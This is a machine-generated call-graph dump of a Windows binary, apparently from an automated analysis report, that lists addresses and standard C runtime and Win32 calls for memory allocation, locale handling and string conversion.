40ce13 IsDebuggerPresent 14163->14165 14164->14115 14171 4138fc 14165->14171 14168 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 14169 413723 __invoke_watson 14168->14169 14170 41372b GetCurrentProcess TerminateProcess 14168->14170 14169->14170 14170->14115 14171->14168 14173 40e7d7 GetProcAddress 14172->14173 14174 40e7ec ExitProcess 14172->14174 14173->14174 14175 40e7e7 CorExitProcess 14173->14175 14175->14174 14177 40b900 14176->14177 14178 40b85f 14176->14178 14179 40d2e3 __calloc_impl 6 API calls 14177->14179 14180 40b870 14178->14180 14186 40b8f8 14178->14186 14187 40b8bc RtlAllocateHeap 14178->14187 14189 40b8ec 14178->14189 14190 40d2e3 __calloc_impl 6 API calls 14178->14190 14192 40b8f1 14178->14192 14194 40b7fe 14178->14194 14181 40b906 14179->14181 14180->14178 14182 40ec4d __FF_MSGBANNER 62 API calls 14180->14182 14185 40eaa2 __NMSG_WRITE 62 API calls 14180->14185 14188 40e7ee _doexit 4 API calls 14180->14188 14183 40bfc1 __flsbuf 62 API calls 14181->14183 14182->14180 14183->14186 14185->14180 14186->14087 14187->14178 14188->14180 14191 40bfc1 __flsbuf 62 API calls 14189->14191 14190->14178 14191->14192 14193 40bfc1 __flsbuf 62 API calls 14192->14193 14193->14186 14195 40b80a _doexit 14194->14195 14196 40d6e0 __lock 63 API calls 14195->14196 14198 40b83b _doexit 14195->14198 14197 40b820 14196->14197 14199 40def2 ___sbh_alloc_block 5 API calls 14197->14199 14198->14178 14200 40b82b 14199->14200 14202 40b844 14200->14202 14205 40d606 LeaveCriticalSection 14202->14205 14204 40b84b 14204->14198 14205->14204 14206->14093 14208 40daa0 HeapAlloc 14207->14208 14209 40da6c HeapReAlloc 14207->14209 14210 40da8a 14208->14210 14212 40dac3 VirtualAlloc 14208->14212 14209->14210 14211 40da8e 14209->14211 14210->13978 14211->14208 14212->14210 14213 40dadd HeapFree 14212->14213 14213->14210 14215 40db20 VirtualAlloc 14214->14215 14217 40db67 14215->14217 14217->13980 14218->13984 14219->13917 14238 40d606 LeaveCriticalSection 14220->14238 14222 41066c 14222->13927 14224 4145f0 InterlockedIncrement 14223->14224 14225 4145f3 14223->14225 14224->14225 14226 414600 14225->14226 14227 4145fd InterlockedIncrement 14225->14227 14228 41460a InterlockedIncrement 14226->14228 14229 41460d 14226->14229 14227->14226 14228->14229 14230 414617 InterlockedIncrement 14229->14230 14231 41461a 14229->14231 14230->14231 14232 414633 InterlockedIncrement 14231->14232 14233 414643 InterlockedIncrement 14231->14233 14234 41464e InterlockedIncrement 14231->14234 14232->14231 14233->14231 14234->13930 14239 40d606 LeaveCriticalSection 14235->14239 14237 4106ba 14237->13932 14238->14222 14239->14237 14240->13729 14242 41265c 14241->14242 14245 4126c9 14242->14245 14251 416836 14242->14251 14244 4127c7 14244->13773 14244->13775 14245->14244 14246 416836 73 API calls _parse_cmdline 14245->14246 14246->14245 14248 414474 14247->14248 14249 41447b 14247->14249 14473 4142d1 14248->14473 14249->13768 14254 4167e3 14251->14254 14257 40ec86 14254->14257 14258 40ec99 14257->14258 14264 40ece6 14257->14264 14265 410735 14258->14265 14261 40ecc6 14261->14264 14285 413fcc 14261->14285 14264->14242 14266 4106bc __getptd_noexit 63 API calls 14265->14266 14267 41073d 14266->14267 14268 40ec9e 14267->14268 14269 40e79a __amsg_exit 63 API calls 14267->14269 14268->14261 14270 414738 14268->14270 14269->14268 14271 414744 _doexit 14270->14271 14272 410735 __getptd 63 API calls 14271->14272 14273 414749 14272->14273 14274 414777 14273->14274 14276 41475b 14273->14276 14275 40d6e0 __lock 63 API calls 14274->14275 14277 41477e 14275->14277 14278 410735 __getptd 63 API calls 14276->14278 14301 4146fa 14277->14301 14281 414760 14278->14281 14283 41476e _doexit 14281->14283 14284 40e79a __amsg_exit 63 API calls 14281->14284 14283->14261 14284->14283 14286 413fd8 _doexit 14285->14286 14287 410735 __getptd 63 API calls 14286->14287 14288 413fdd 14287->14288 14289 40d6e0 __lock 63 API calls 14288->14289 14297 413fef 14288->14297 14290 41400d 14289->14290 14291 414056 14290->14291 14292 414024 InterlockedDecrement 14290->14292 14293 41403e InterlockedIncrement 14290->14293 14469 414067 14291->14469 14292->14293 14296 41402f 14292->14296 14293->14291 14295 40e79a __amsg_exit 63 API calls 14298 413ffd _doexit 14295->14298 14296->14293 14299 40b6b5 ___endstdio 63 API calls 14296->14299 14297->14295 14297->14298 14298->14264 14300 41403d 14299->14300 14300->14293 14302 4146fe 14301->14302 14308 414730 14301->14308 14303 4145d2 ___addlocaleref 8 API calls 14302->14303 14302->14308 14304 414711 14303->14304 14304->14308 14312 414661 14304->14312 14309 4147a2 14308->14309 14468 40d606 LeaveCriticalSection 14309->14468 14311 4147a9 14311->14281 14313 414672 InterlockedDecrement 14312->14313 14314 4146f5 14312->14314 14315 414687 InterlockedDecrement 14313->14315 14316 41468a 14313->14316 14314->14308 14326 414489 14314->14326 14315->14316 14317 414694 InterlockedDecrement 14316->14317 14318 414697 14316->14318 14317->14318 14319 4146a1 InterlockedDecrement 14318->14319 14320 4146a4 14318->14320 14319->14320 14321 4146ae InterlockedDecrement 14320->14321 14322 4146b1 14320->14322 14321->14322 14323 4146ca InterlockedDecrement 14322->14323 14324 4146da InterlockedDecrement 14322->14324 14325 4146e5 InterlockedDecrement 14322->14325 14323->14322 14324->14322 14325->14314 14327 41450d 14326->14327 14328 4144a0 14326->14328 14329 41455a 14327->14329 14330 40b6b5 ___endstdio 63 API calls 14327->14330 14328->14327 14336 40b6b5 ___endstdio 63 API calls 14328->14336 14339 4144d4 14328->14339 14352 414581 14329->14352 14380 417667 14329->14380 14332 41452e 14330->14332 14334 40b6b5 ___endstdio 63 API calls 14332->14334 14340 414541 14334->14340 14335 40b6b5 ___endstdio 63 API calls 14341 414502 14335->14341 14342 4144c9 14336->14342 14337 40b6b5 ___endstdio 63 API calls 14337->14352 14338 4145c6 14343 40b6b5 ___endstdio 63 API calls 14338->14343 14344 40b6b5 ___endstdio 63 API calls 14339->14344 14355 4144f5 14339->14355 14346 40b6b5 ___endstdio 63 API calls 14340->14346 14347 40b6b5 ___endstdio 63 API calls 14341->14347 14356 417841 14342->14356 14349 4145cc 14343->14349 14350 4144ea 14344->14350 14345 40b6b5 63 API calls ___endstdio 14345->14352 14351 41454f 14346->14351 14347->14327 14349->14308 14372 4177fc 14350->14372 14354 40b6b5 ___endstdio 63 API calls 14351->14354 14352->14338 14352->14345 14354->14329 14355->14335 14357 4178cb 14356->14357 14358 41784e 14356->14358 14357->14339 14359 41785f 14358->14359 14360 40b6b5 ___endstdio 63 API calls 14358->14360 14361 417871 14359->14361 14362 40b6b5 ___endstdio 63 API calls 14359->14362 14360->14359 14363 417883 14361->14363 14364 40b6b5 ___endstdio 63 API calls 14361->14364 14362->14361 14365 417895 14363->14365 14367 40b6b5 ___endstdio 63 API calls 14363->14367 14364->14363 14366 4178a7 14365->14366 14368 40b6b5 ___endstdio 63 API calls 14365->14368 14369 4178b9 14366->14369 14370 40b6b5 ___endstdio 63 API calls 14366->14370 14367->14365 14368->14366 14369->14357 14371 40b6b5 ___endstdio 63 API calls 14369->14371 14370->14369 14371->14357 14373 417809 14372->14373 14379 41783d 14372->14379 14374 40b6b5 ___endstdio 63 API calls 14373->14374 14375 417819 14373->14375 14374->14375 14376 41782b 14375->14376 14377 40b6b5 ___endstdio 63 API calls 14375->14377 14378 40b6b5 ___endstdio 63 API calls 14376->14378 14376->14379 14377->14376 14378->14379 14379->14355 14381 41457a 14380->14381 14382 417678 14380->14382 14381->14337 14383 40b6b5 ___endstdio 63 API calls 14382->14383 14384 417680 14383->14384 14385 40b6b5 ___endstdio 63 API calls 14384->14385 14386 417688 14385->14386 14387 40b6b5 ___endstdio 63 API calls 14386->14387 14388 417690 14387->14388 14389 40b6b5 ___endstdio 63 API calls 14388->14389 14390 417698 14389->14390 14391 40b6b5 ___endstdio 63 API calls 14390->14391 14392 4176a0 14391->14392 14393 40b6b5 ___endstdio 63 API calls 14392->14393 14394 4176a8 14393->14394 14395 40b6b5 ___endstdio 63 API calls 14394->14395 14396 4176af 14395->14396 14397 40b6b5 ___endstdio 63 API calls 14396->14397 14398 4176b7 14397->14398 14399 40b6b5 ___endstdio 63 API calls 14398->14399 14400 4176bf 14399->14400 14401 40b6b5 ___endstdio 63 API calls 14400->14401 14402 4176c7 14401->14402 14403 40b6b5 ___endstdio 63 API calls 14402->14403 14404 4176cf 14403->14404 14405 40b6b5 ___endstdio 63 API calls 14404->14405 14406 4176d7 14405->14406 14407 40b6b5 ___endstdio 63 API calls 14406->14407 14408 4176df 14407->14408 14409 40b6b5 ___endstdio 63 API calls 14408->14409 14410 4176e7 14409->14410 14411 40b6b5 ___endstdio 63 API calls 14410->14411 14412 4176ef 14411->14412 14413 40b6b5 ___endstdio 63 API calls 14412->14413 14414 4176f7 14413->14414 14415 40b6b5 ___endstdio 63 API calls 14414->14415 14416 417702 14415->14416 14417 40b6b5 ___endstdio 63 API calls 14416->14417 14418 41770a 14417->14418 14419 40b6b5 ___endstdio 63 API calls 14418->14419 14420 417712 14419->14420 14421 40b6b5 ___endstdio 63 API calls 14420->14421 14422 41771a 14421->14422 14423 40b6b5 ___endstdio 63 API calls 14422->14423 14424 417722 14423->14424 14425 40b6b5 ___endstdio 63 API calls 14424->14425 14426 41772a 14425->14426 14427 40b6b5 ___endstdio 63 API calls 14426->14427 14428 417732 14427->14428 14429 40b6b5 ___endstdio 63 API calls 14428->14429 14430 41773a 14429->14430 14431 40b6b5 ___endstdio 63 API calls 14430->14431 14432 417742 14431->14432 14433 40b6b5 ___endstdio 63 API calls 14432->14433 14434 41774a 14433->14434 14435 40b6b5 ___endstdio 63 API calls 14434->14435 14436 417752 14435->14436 14437 40b6b5 ___endstdio 63 API calls 14436->14437 14438 41775a 14437->14438 14439 40b6b5 ___endstdio 63 API calls 14438->14439 14440 417762 14439->14440 14441 40b6b5 ___endstdio 63 API calls 14440->14441 14442 41776a 14441->14442 14443 40b6b5 ___endstdio 63 API calls 14442->14443 14444 417772 14443->14444 14445 40b6b5 ___endstdio 63 API calls 14444->14445 14446 41777a 14445->14446 14447 40b6b5 ___endstdio 63 API calls 14446->14447 14448 417788 14447->14448 14449 40b6b5 ___endstdio 63 API calls 14448->14449 14450 417793 14449->14450 14451 40b6b5 ___endstdio 63 API calls 14450->14451 14452 41779e 14451->14452 14453 40b6b5 ___endstdio 63 API calls 14452->14453 14454 4177a9 14453->14454 14455 40b6b5 ___endstdio 63 API calls 14454->14455 14456 4177b4 14455->14456 14457 40b6b5 ___endstdio 63 API calls 14456->14457 14458 4177bf 14457->14458 14459 40b6b5 ___endstdio 63 API calls 14458->14459 14460 4177ca 14459->14460 14461 40b6b5 ___endstdio 63 API calls 14460->14461 14462 4177d5 14461->14462 14463 40b6b5 ___endstdio 63 API calls 14462->14463 14464 4177e0 14463->14464 14465 40b6b5 ___endstdio 63 API calls 14464->14465 14466 4177eb 14465->14466 14467 40b6b5 ___endstdio 63 API calls 14466->14467 14467->14381 14468->14311 14472 40d606 LeaveCriticalSection 14469->14472 14471 41406e 14471->14297 14472->14471 14474 4142dd _doexit 14473->14474 14475 410735 __getptd 63 API calls 14474->14475 14476 4142e6 14475->14476 14477 413fcc _LocaleUpdate::_LocaleUpdate 65 API calls 14476->14477 14478 4142f0 14477->14478 14504 414070 14478->14504 14481 411c75 __malloc_crt 63 API calls 14482 414311 14481->14482 14483 414430 _doexit 14482->14483 14511 4140ec 14482->14511 14483->14249 14486 414341 InterlockedDecrement 14488 414351 14486->14488 14489 414362 InterlockedIncrement 14486->14489 14487 41443d 14487->14483 14490 414450 14487->14490 14492 40b6b5 ___endstdio 63 API calls 14487->14492 14488->14489 14494 40b6b5 ___endstdio 63 API calls 14488->14494 14489->14483 14491 414378 14489->14491 14493 40bfc1 __flsbuf 63 API calls 14490->14493 14491->14483 14495 40d6e0 __lock 63 API calls 14491->14495 14492->14490 14493->14483 14496 414361 14494->14496 14497 41438c InterlockedDecrement 14495->14497 14496->14489 14499 414408 14497->14499 14500 41441b InterlockedIncrement 14497->14500 14499->14500 14502 40b6b5 ___endstdio 63 API calls 14499->14502 14521 414432 14500->14521 14503 41441a 14502->14503 14503->14500 14505 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14504->14505 14506 414084 14505->14506 14507 4140ad 14506->14507 14508 41408f GetOEMCP 14506->14508 14509 4140b2 GetACP 14507->14509 14510 41409f 14507->14510 14508->14510 14509->14510 14510->14481 14510->14483 14512 414070 getSystemCP 75 API calls 14511->14512 14515 41410c 14512->14515 14513 414117 setSBCS 14516 40ce09 __atodbl_l 5 API calls 14513->14516 14514 414180 _memset __setmbcp_nolock 14524 413e39 GetCPInfo 14514->14524 14515->14513 14515->14514 14517 41415b IsValidCodePage 14515->14517 14518 4142cf 14516->14518 14517->14513 14519 41416d GetCPInfo 14517->14519 14518->14486 14518->14487 14519->14513 14519->14514 14657 40d606 LeaveCriticalSection 14521->14657 14523 414439 14523->14483 14526 413e6d _memset 14524->14526 14533 413f1f 14524->14533 14534 417625 14526->14534 14529 40ce09 __atodbl_l 5 API calls 14531 413fca 14529->14531 14531->14514 14532 417426 ___crtLCMapStringA 98 API calls 14532->14533 14533->14529 14535 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14534->14535 14536 417638 14535->14536 14544 41746b 14536->14544 14539 417426 14540 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14539->14540 14541 417439 14540->14541 14610 417081 14541->14610 14545 4174b7 14544->14545 14546 41748c GetStringTypeW 14544->14546 14547 4174a4 14545->14547 14549 41759e 14545->14549 14546->14547 14548 4174ac GetLastError 14546->14548 14550 4174f0 MultiByteToWideChar 14547->14550 14567 417598 14547->14567 14548->14545 14572 417a20 GetLocaleInfoA 14549->14572 14555 41751d 14550->14555 14550->14567 14552 40ce09 __atodbl_l 5 API calls 14554 413eda 14552->14554 14554->14539 14557 417532 _memset __crtCompareStringA_stat 14555->14557 14560 40b84d _malloc 63 API calls 14555->14560 14556 4175ef GetStringTypeA 14559 41760a 14556->14559 14556->14567 14558 41756b MultiByteToWideChar 14557->14558 14557->14567 14563 417581 GetStringTypeW 14558->14563 14564 417592 14558->14564 14565 40b6b5 ___endstdio 63 API calls 14559->14565 14560->14557 14563->14564 14568 4147ae 14564->14568 14565->14567 14567->14552 14569 4147ba 14568->14569 14570 4147cb 14568->14570 14569->14570 14571 40b6b5 ___endstdio 63 API calls 14569->14571 14570->14567 14571->14570 14573 417a53 14572->14573 14575 417a4e 14572->14575 14603 416f54 14573->14603 14576 40ce09 __atodbl_l 5 API calls 14575->14576 14577 4175c2 14576->14577 14577->14556 14577->14567 14578 417a69 14577->14578 14579 417aa9 GetCPInfo 14578->14579 14580 417b33 14578->14580 14581 417ac0 14579->14581 14582 417b1e MultiByteToWideChar 14579->14582 14584 40ce09 __atodbl_l 5 API calls 14580->14584 14581->14582 14583 417ac6 GetCPInfo 14581->14583 14582->14580 14587 417ad9 _strlen 14582->14587 14583->14582 14585 417ad3 14583->14585 14586 4175e3 14584->14586 14585->14582 14585->14587 14586->14556 14586->14567 14588 40b84d _malloc 63 API calls 14587->14588 14590 417b0b _memset __crtCompareStringA_stat 14587->14590 14588->14590 14589 417b68 MultiByteToWideChar 14591 417b80 14589->14591 14592 417b9f 14589->14592 14590->14580 14590->14589 14594 417ba4 14591->14594 14595 417b87 WideCharToMultiByte 14591->14595 14593 4147ae __freea 63 API calls 14592->14593 14593->14580 14596 417bc3 14594->14596 14597 417baf WideCharToMultiByte 14594->14597 14595->14592 14598 411cba __calloc_crt 63 API calls 14596->14598 14597->14592 14597->14596 14599 417bcb 14598->14599 14599->14592 14600 417bd4 WideCharToMultiByte 14599->14600 14600->14592 14601 417be6 14600->14601 14602 40b6b5 ___endstdio 63 API calls 14601->14602 14602->14592 14606 41a354 14603->14606 14607 41a36d 14606->14607 14608 41a125 strtoxl 87 API calls 14607->14608 14609 416f65 14608->14609 14609->14575 14611 4170a2 LCMapStringW 14610->14611 14614 4170bd 14610->14614 14612 4170c5 GetLastError 14611->14612 14611->14614 14612->14614 14613 4172bb 14616 417a20 ___ansicp 87 API calls 14613->14616 14614->14613 14615 417117 14614->14615 14617 417130 MultiByteToWideChar 14615->14617 14640 4172b2 14615->14640 14619 4172e3 14616->14619 14624 41715d 14617->14624 14617->14640 14618 40ce09 __atodbl_l 5 API calls 14620 413efa 14618->14620 14622 4173d7 LCMapStringA 14619->14622 14623 4172fc 14619->14623 14619->14640 14620->14532 14621 417176 __crtCompareStringA_stat 14626 4171ae MultiByteToWideChar 14621->14626 14621->14640 14635 417333 14622->14635 14625 417a69 ___convertcp 70 API calls 14623->14625 14624->14621 14628 40b84d _malloc 63 API calls 14624->14628 14629 41730e 14625->14629 14627 4171c7 LCMapStringW 14626->14627 14652 4172a9 14626->14652 14630 4171e8 14627->14630 14627->14652 14628->14621 14632 417318 LCMapStringA 14629->14632 14629->14640 14636 4171f1 14630->14636 14637 41721a 14630->14637 14631 40b6b5 ___endstdio 63 API calls 14634 4173fe 14631->14634 14632->14635 14642 41733a 14632->14642 14633 4147ae __freea 63 API calls 14633->14640 14638 40b6b5 ___endstdio 63 API calls 14634->14638 14634->14640 14635->14631 14635->14634 14639 417203 LCMapStringW 14636->14639 14636->14652 14647 40b84d _malloc 63 API calls 14637->14647 14650 417235 __crtCompareStringA_stat 14637->14650 14638->14640 14639->14652 14640->14618 14641 417269 LCMapStringW 14644 417281 WideCharToMultiByte 14641->14644 14645 4172a3 14641->14645 14643 41734b _memset __crtCompareStringA_stat 14642->14643 14646 40b84d _malloc 63 API calls 14642->14646 14643->14635 14649 417389 LCMapStringA 14643->14649 14644->14645 14648 4147ae __freea 63 API calls 14645->14648 14646->14643 14647->14650 14648->14652 14653 4173a5 14649->14653 14654 4173a9 14649->14654 14650->14641 14650->14652 14652->14633 14656 4147ae __freea 63 API calls 14653->14656 14655 417a69 ___convertcp 70 API calls 14654->14655 14655->14653 14656->14635 14657->14523 14659 41358c 14658->14659 14660 41046e __encode_pointer 6 API calls 14659->14660 14661 4135a4 14659->14661 14660->14659 14661->13796 14665 40d281 14662->14665 14664 40d2ca 14664->13798 14666 40d28d _doexit 14665->14666 14673 40e806 14666->14673 14672 40d2ae _doexit 14672->14664 14674 40d6e0 __lock 63 API calls 14673->14674 14675 40d292 14674->14675 14676 40d196 14675->14676 14677 4104e9 __decode_pointer 6 API calls 14676->14677 14678 40d1aa 14677->14678 14679 4104e9 __decode_pointer 6 API calls 14678->14679 14680 40d1ba 14679->14680 14689 40d23d 14680->14689 14696 40e56a 14680->14696 14682 41046e __encode_pointer 6 API calls 14684 40d232 14682->14684 14683 40d1d8 14685 40d1fc 14683->14685 14692 40d224 14683->14692 14709 411d06 14683->14709 14687 41046e __encode_pointer 6 API calls 14684->14687 14688 411d06 __realloc_crt 73 API calls 14685->14688 14685->14689 14690 40d212 14685->14690 14687->14689 14688->14690 14693 40d2b7 14689->14693 14690->14689 14691 41046e __encode_pointer 6 API calls 14690->14691 14691->14692 14692->14682 14758 40e80f 14693->14758 14697 40e576 _doexit 14696->14697 14698 40e5a3 14697->14698 14699 40e586 14697->14699 14700 40e5e4 HeapSize 14698->14700 14702 40d6e0 __lock 63 API calls 14698->14702 14701 40bfc1 __flsbuf 63 API calls 14699->14701 14705 40e59b _doexit 14700->14705 14703 40e58b 14701->14703 14706 40e5b3 ___sbh_find_block 14702->14706 14704 40e744 __msize 6 API calls 14703->14704 14704->14705 14705->14683 14714 40e604 14706->14714 14713 411d0f 14709->14713 14711 411d4e 14711->14685 14712 411d2f Sleep 14712->14713 14713->14711 14713->14712 14718 40e34f 14713->14718 14717 40d606 LeaveCriticalSection 14714->14717 14716 40e5df 14716->14700 14716->14705 14717->14716 14719 40e35b _doexit 14718->14719 14720 40e370 14719->14720 14721 40e362 14719->14721 14723 40e383 14720->14723 14724 40e377 14720->14724 14722 40b84d _malloc 63 API calls 14721->14722 14740 40e36a __dosmaperr _doexit 14722->14740 14730 40e4f5 14723->14730 14752 40e390 _memcpy_s ___sbh_resize_block ___sbh_find_block 14723->14752 14725 40b6b5 ___endstdio 63 API calls 14724->14725 14725->14740 14726 40e528 14728 40d2e3 __calloc_impl 6 API calls 14726->14728 14727 40e4fa HeapReAlloc 14727->14730 14727->14740 14731 40e52e 14728->14731 14729 40d6e0 __lock 63 API calls 14729->14752 14730->14726 14730->14727 14732 40e54c 14730->14732 14734 40d2e3 __calloc_impl 6 API calls 14730->14734 14736 40e542 14730->14736 14733 40bfc1 __flsbuf 63 API calls 14731->14733 14735 40bfc1 __flsbuf 63 API calls 14732->14735 14732->14740 14733->14740 14734->14730 14737 40e555 GetLastError 14735->14737 14739 40bfc1 __flsbuf 63 API calls 14736->14739 14737->14740 14742 40e4c3 14739->14742 14740->14713 14741 40e41b HeapAlloc 14741->14752 14742->14740 14744 40e4c8 GetLastError 14742->14744 14743 40e470 HeapReAlloc 14743->14752 14744->14740 14745 40def2 ___sbh_alloc_block 5 API calls 14745->14752 14746 40e4db 14746->14740 14748 40bfc1 __flsbuf 63 API calls 14746->14748 14747 40d2e3 __calloc_impl 6 API calls 14747->14752 14749 40e4e8 14748->14749 14749->14737 14749->14740 14750 40e4be 14751 40bfc1 __flsbuf 63 API calls 14750->14751 14751->14742 14752->14726 14752->14729 14752->14740 14752->14741 14752->14743 14752->14745 14752->14746 14752->14747 14752->14750 14753 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 14752->14753 14754 40e493 14752->14754 14753->14752 14757 40d606 LeaveCriticalSection 14754->14757 14756 40e49a 14756->14752 14757->14756 14761 40d606 LeaveCriticalSection 14758->14761 14760 40d2bc 14760->14672 14761->14760 14765 40b9aa _doexit _strnlen 14762->14765 14763 40b9b8 14764 40bfc1 __flsbuf 63 API calls 14763->14764 14766 40b9bd 14764->14766 14765->14763 14768 40b9ec 14765->14768 14767 40e744 __msize 6 API calls 14766->14767 14772 40b9cd _doexit 14767->14772 14769 40d6e0 __lock 63 API calls 14768->14769 14770 40b9f3 14769->14770 14819 40b917 14770->14819 14772->13802 14776 4017cc _memcpy_s 14775->14776 14776->13806 14779 40af70 14777->14779 14778 40b84d _malloc 63 API calls 14778->14779 14779->14778 14780 40af8a 14779->14780 14781 40d2e3 __calloc_impl 6 API calls 14779->14781 14782 40af8c std::bad_alloc::bad_alloc 14779->14782 14780->13812 14781->14779 14785 40d2bd __cinit 74 API calls 14782->14785 14787 40afb2 14782->14787 14785->14787 15033 40af49 14787->15033 14788 40afca 14790 401903 lstrlenA 14789->14790 14791 4018fc 14789->14791 15045 4017e0 14790->15045 14791->13834 14794 401940 GetLastError 14796 40194b MultiByteToWideChar 14794->14796 14797 40198d 14794->14797 14795 401996 14795->13834 14798 4017e0 73 API calls 14796->14798 14797->14795 15053 401030 GetLastError 14797->15053 14799 401970 MultiByteToWideChar 14798->14799 14799->14797 14802 40af66 75 API calls 14801->14802 14803 40187c 14802->14803 14804 401885 SysAllocString 14803->14804 14805 4018a4 14803->14805 14804->14805 14805->13836 14807 40231a SafeArrayUnaccessData 14806->14807 14807->13843 14809 4019aa InterlockedDecrement 14808->14809 14810 4019df VariantClear 14808->14810 14809->14810 14811 4019b8 14809->14811 14810->13850 14811->14810 14812 4019c2 SysFreeString 14811->14812 14813 4019c9 14811->14813 14812->14813 15062 40aec0 14813->15062 14816 401571 14815->14816 14818 401582 14815->14818 15068 40afe0 14816->15068 14818->13814 14818->14818 14820 40b930 14819->14820 14821 40b92c 14819->14821 14820->14821 14823 40b942 _strlen 14820->14823 14828 40eeab 14820->14828 14825 40ba18 14821->14825 14823->14821 14838 40edfb 14823->14838 15032 40d606 LeaveCriticalSection 14825->15032 14827 40ba1f 14827->14772 14829 40ef2b 14828->14829 14832 40eec6 14828->14832 14829->14823 14830 40eecc WideCharToMultiByte 14830->14829 14830->14832 14831 411cba __calloc_crt 63 API calls 14831->14832 14832->14829 14832->14830 14832->14831 14833 40eeef WideCharToMultiByte 14832->14833 14837 40b6b5 ___endstdio 63 API calls 14832->14837 14841 414d44 14832->14841 14833->14832 14834 40ef37 14833->14834 14835 40b6b5 ___endstdio 63 API calls 14834->14835 14835->14829 14837->14832 14933 40ed0d 14838->14933 14842 414d76 14841->14842 14843 414d59 14841->14843 14845 414dd4 14842->14845 14887 417e7e 14842->14887 14844 40bfc1 __flsbuf 63 API calls 14843->14844 14846 414d5e 14844->14846 14847 40bfc1 __flsbuf 63 API calls 14845->14847 14849 40e744 __msize 6 API calls 14846->14849 14875 414d6e 14847->14875 14849->14875 14851 414db5 14853 414e12 14851->14853 14854 414de7 14851->14854 14855 414dcb 14851->14855 14853->14875 14898 414c98 14853->14898 14859 411c75 __malloc_crt 63 API calls 14854->14859 14854->14875 14857 40eeab ___wtomb_environ 120 API calls 14855->14857 14860 414dd0 14857->14860 14862 414df7 14859->14862 14860->14845 14860->14853 14861 414e8f 14863 414f7a 14861->14863 14868 414e98 14861->14868 14862->14853 14867 411c75 __malloc_crt 63 API calls 14862->14867 14862->14875 14865 40b6b5 ___endstdio 63 API calls 14863->14865 14864 414e41 14866 40b6b5 ___endstdio 63 API calls 14864->14866 14865->14875 14870 414e4b 14866->14870 14867->14853 14869 411d54 __recalloc_crt 74 API calls 14868->14869 14868->14875 14872 414e51 _strlen 14869->14872 14870->14872 14902 411d54 14870->14902 14874 411cba __calloc_crt 63 API calls 14872->14874 14872->14875 14886 414f5e 14872->14886 14873 40b6b5 ___endstdio 63 API calls 14873->14875 14876 414efb _strlen 14874->14876 14875->14832 14877 40ef42 _strcpy_s 63 API calls 14876->14877 14876->14886 14878 414f14 14877->14878 14879 414f28 SetEnvironmentVariableA 14878->14879 14880 40e61c __invoke_watson 10 API calls 14878->14880 14881 414f49 14879->14881 14882 414f52 14879->14882 14884 414f25 14880->14884 14885 40bfc1 __flsbuf 63 API calls 14881->14885 14883 40b6b5 ___endstdio 63 API calls 14882->14883 14883->14886 14884->14879 14885->14882 14886->14873 14886->14875 14907 417dc2 14887->14907 14889 414d89 14889->14845 14889->14851 14890 414cea 14889->14890 14891 414d3b 14890->14891 14892 414cfb 14890->14892 14891->14851 14893 411cba __calloc_crt 63 API calls 14892->14893 14894 414d12 14893->14894 14895 40e79a __amsg_exit 63 API calls 14894->14895 14897 414d24 14894->14897 14895->14897 14897->14891 14914 417d6d 14897->14914 14899 414ca6 14898->14899 14900 40edfb __fassign 107 API calls 14899->14900 14901 414ccd 14899->14901 14900->14899 14901->14861 14901->14864 14903 411d5d 14902->14903 14905 411da0 14903->14905 14906 411d81 Sleep 14903->14906 14922 40b783 14903->14922 14905->14872 14906->14903 14908 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14907->14908 14909 417dd6 14908->14909 14910 40bfc1 __flsbuf 63 API calls 14909->14910 14913 417df4 __mbschr_l 14909->14913 14911 417de4 14910->14911 14912 40e744 __msize 6 API calls 14911->14912 14912->14913 14913->14889 14915 417d7e _strlen 14914->14915 14921 417d7a 14914->14921 14916 40b84d _malloc 63 API calls 14915->14916 14917 417d91 14916->14917 14918 40ef42 _strcpy_s 63 API calls 14917->14918 14917->14921 14919 417da3 14918->14919 14920 40e61c __invoke_watson 10 API calls 14919->14920 14919->14921 14920->14921 14921->14897 14923 40b792 14922->14923 14924 40b7ba 14922->14924 14923->14924 14925 40b79e 14923->14925 14926 40b7cf 14924->14926 14927 40e56a __msize 64 API calls 14924->14927 14929 40bfc1 __flsbuf 63 API calls 14925->14929 14928 40e34f _realloc 72 API calls 14926->14928 14927->14926 14932 40b7b3 _memset 14928->14932 14930 40b7a3 14929->14930 14931 40e744 __msize 6 API calls 14930->14931 14931->14932 14932->14903 14934 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14933->14934 14935 40ed21 14934->14935 14936 40ed42 14935->14936 14937 40ed75 14935->14937 14950 40ed2a 14935->14950 14938 40bfc1 __flsbuf 63 API calls 14936->14938 14940 40ed99 14937->14940 14941 40ed7f 14937->14941 14939 40ed47 14938->14939 14942 40e744 __msize 6 API calls 14939->14942 14944 40eda1 14940->14944 14945 40edb5 14940->14945 14943 40bfc1 __flsbuf 63 API calls 14941->14943 14942->14950 14947 40ed84 14943->14947 14951 414b9e 14944->14951 14971 414b5c 14945->14971 14949 40e744 __msize 6 API calls 14947->14949 14949->14950 14950->14823 14952 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14951->14952 14953 414bb2 14952->14953 14954 414bd3 14953->14954 14955 414c06 14953->14955 14970 414bbb 14953->14970 14956 40bfc1 __flsbuf 63 API calls 14954->14956 14957 414c10 14955->14957 14958 414c2a 14955->14958 14959 414bd8 14956->14959 14960 40bfc1 __flsbuf 63 API calls 14957->14960 14961 414c34 14958->14961 14962 414c49 14958->14962 14963 40e744 __msize 6 API calls 14959->14963 14964 414c15 14960->14964 14976 417c1d 14961->14976 14966 414b5c ___crtCompareStringA 96 API calls 14962->14966 14963->14970 14967 40e744 __msize 6 API calls 14964->14967 14968 414c63 14966->14968 14967->14970 14969 40bfc1 __flsbuf 63 API calls 14968->14969 14968->14970 14969->14970 14970->14950 14972 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14971->14972 14973 414b6f 14972->14973 14992 4147ec 14973->14992 14977 417c33 14976->14977 14978 417c58 ___ascii_strnicmp 14976->14978 14979 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14977->14979 14978->14970 14980 417c3e 14979->14980 14981 417c43 14980->14981 14983 417c78 14980->14983 14982 40bfc1 __flsbuf 63 API calls 14981->14982 14985 417c48 14982->14985 14984 417c82 14983->14984 14991 417caa 14983->14991 14986 